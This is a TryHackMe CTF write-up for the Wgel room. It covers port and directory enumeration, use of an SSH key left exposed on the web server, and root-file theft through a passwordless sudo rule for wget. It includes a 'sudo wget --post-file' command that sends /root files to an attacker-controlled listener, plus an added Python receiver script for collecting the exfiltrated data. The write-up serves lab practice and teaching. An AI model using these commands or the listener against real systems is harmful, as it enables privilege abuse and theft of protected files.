TryHackMe: Wgel write-up

In this article we'll tackle an easy CTF on TryHackMe. We'll enumerate a Linux box, find misplaced SSH credentials, and abuse a passwordless sudo rule on a common Linux tool to read files as root and exfiltrate them.

Link: https://tryhackme.com/room/wgelctf

Difficulty: Easy

Authors: MrSeth6797

First steps and enumeration

Our journey into this CTF begins with a full TCP port scan (-p- covers all 65535 ports, -sV grabs service banners). Only two ports are open: SSH on 22 (OpenSSH 7.2p2 Ubuntu 4ubuntu2.8) and HTTP on 80 (Apache httpd 2.4.18). Both package versions correspond to Ubuntu 16.04:

$ nmap -sV -sT -p- -oN nmap/full-scan.nmap $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 15:18 CET
Nmap scan report for 10.10.222.165
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds

The web server only shows the default page bundled with the Apache installation. A quick GoBuster scan with the directory-list-lowercase-2.3-medium.txt list shows that there is more than meets the eye:

$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | tee gobuster.log

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.222.165
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/sitemap (Status: 301) [Size: 316] [--> http://10.10.222.165/sitemap/]
Progress: 62904 / 207644 (30.29%)

The scan was stopped at about 30% once a /sitemap directory showed up, since nothing links to it from the default page. Viewing the source of the default page also reveals a comment that hints at a username:

<!-- Jessie don’t forget to udate the website. -->

Jessie is a plausible login name, which will matter once we have something to authenticate with. Next, we visit /sitemap.

It's a ColorLib template and nothing stands out in the page itself. To dig deeper we ran GoBuster against /sitemap as well. The medium list from the first scan turned up nothing useful here, so we switched to dirb's common.txt, a much shorter list that does include dotfile entries such as .htaccess and .ssh:

$ gobuster dir -u http://$IP/sitemap -w /usr/share/wordlists/dirb/common.txt | tee gobuster-sitemap.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.222.165/sitemap
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.ssh (Status: 301) [Size: 321] [--> http://10.10.222.165/sitemap/.ssh/]
/css (Status: 301) [Size: 320] [--> http://10.10.222.165/sitemap/css/]
/fonts (Status: 301) [Size: 322] [--> http://10.10.222.165/sitemap/fonts/]
/images (Status: 301) [Size: 323] [--> http://10.10.222.165/sitemap/images/]
/index.html (Status: 200) [Size: 21080]
/js (Status: 301) [Size: 319] [--> http://10.10.222.165/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

The .ssh directory is the interesting one: it is browsable and contains an SSH private key, the kind of file that should never sit under a web root. We copy it to our machine, restrict its permissions to the owner only (mode 600, otherwise ssh refuses to use it), and log in as jessie, the username from the HTML comment. The key is not passphrase-protected, so it works as-is. The user flag is in Jessie's Documents directory.

Privilege escalation

After gaining a foothold we enumerate the box further. sudo -l shows two entries for jessie. The first, (ALL : ALL) ALL, would grant everything but requires jessie's password, which we don't have. The second is the useful one: jessie may run wget as root without any password:

$ sudo -l
Matching Defaults entries for jessie on CorpOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

We can't list /root as jessie, but since the user flag was named user_flag.txt it is a fair guess that the root flag is /root/root_flag.txt. wget running as root can read that file for us and ship its contents off the box as the body of an HTTP POST.

First, set up a listener on the attacking machine to receive the file. Plain netcat is enough, since --post-file sends the file verbatim as the request body:

$ nc -vlnp 1337

Now let's use wget to send the contents of the root_flag.txt file from the target system to our listener:

$ sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337

The raw request, headers followed by the file contents, appears in the netcat terminal, and with it the root flag. wget on the target hangs waiting for an HTTP response that netcat never sends, so interrupt it once the body has arrived.
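The netcat listener works but is crude: the flag arrives mixed in with request headers, and wget has to be killed by hand. As an added example (not part of the original write-up or the room), here is a small Python listener for the same --post-file exfiltration. It parses the request, appends the body to a file on disk and answers 200 OK so the wget on the target exits cleanly. The embedded sample request is constructed to mirror what wget sends for a 26-byte file; the flag value in it is a placeholder, not the room's flag, and the Host header, port and output path are assumptions.

```python
#!/usr/bin/env python3
"""Receiver for files posted with `sudo wget --post-file=<file> http://<attacker>:<port>/`.

Added example for this write-up, not the original author's tooling.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer


def parse_post(raw: bytes):
    """Split one raw HTTP request into (method, path, headers, body).

    wget --post-file sends the file verbatim as the body and sets
    Content-Length; the body is taken as exactly that many bytes, so any
    trailing data on the socket is ignored and a short read is an error.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no end of headers")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    if len(rest) < length:
        raise ValueError(f"truncated body: have {len(rest)} of {length} bytes")
    return method, path, headers, rest[:length]


class ExfilHandler(BaseHTTPRequestHandler):
    out_path = "loot.bin"  # assumed default; overridden by serve()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        with open(self.out_path, "ab") as f:
            f.write(body)
        # Only the exfiltrated bytes go to stdout; request logging goes to stderr.
        sys.stdout.write(body.decode("utf-8", errors="replace"))
        sys.stdout.flush()
        # Answer so the wget on the target returns instead of waiting for a reply.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        sys.stderr.write("%s - %s\n" % (self.client_address[0], fmt % args))


def serve(port: int, out_path: str) -> None:
    """Listen on all interfaces and append every posted body to out_path."""
    ExfilHandler.out_path = out_path
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


# Constructed sample of the request wget emits for --post-file on a 26-byte
# file. The flag is a placeholder; the Host header is an assumed attacker IP.
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"User-Agent: Wget/1.17.1 (linux-gnu)\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Host: 10.8.0.2:1337\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 26\r\n"
    b"\r\n"
    b"flag{constructed_example}\n"
)

if __name__ == "__main__":
    if len(sys.argv) == 1:
        # Offline demo: parse the embedded sample and show the recovered body.
        _, _, _, body = parse_post(SAMPLE_REQUEST)
        sys.stdout.write(body.decode())
    else:
        serve(int(sys.argv[1]), sys.argv[2] if len(sys.argv) > 2 else "loot.bin")
```

Run it as `python3 exfil_listener.py 1337 root_flag.txt` on the attacking machine, then issue the same `sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337/` on the target; the body lands in root_flag.txt and wget exits on the 200. With no arguments the script only runs the parser over the embedded sample. One caveat worth knowing about this sudo rule: a root-level wget is not limited to reading. Its -O option writes the download to an arbitrary path as root, so the same misconfiguration is also a full escalation path (GTFOBins documents both the read and the write); the write-up only needs the read.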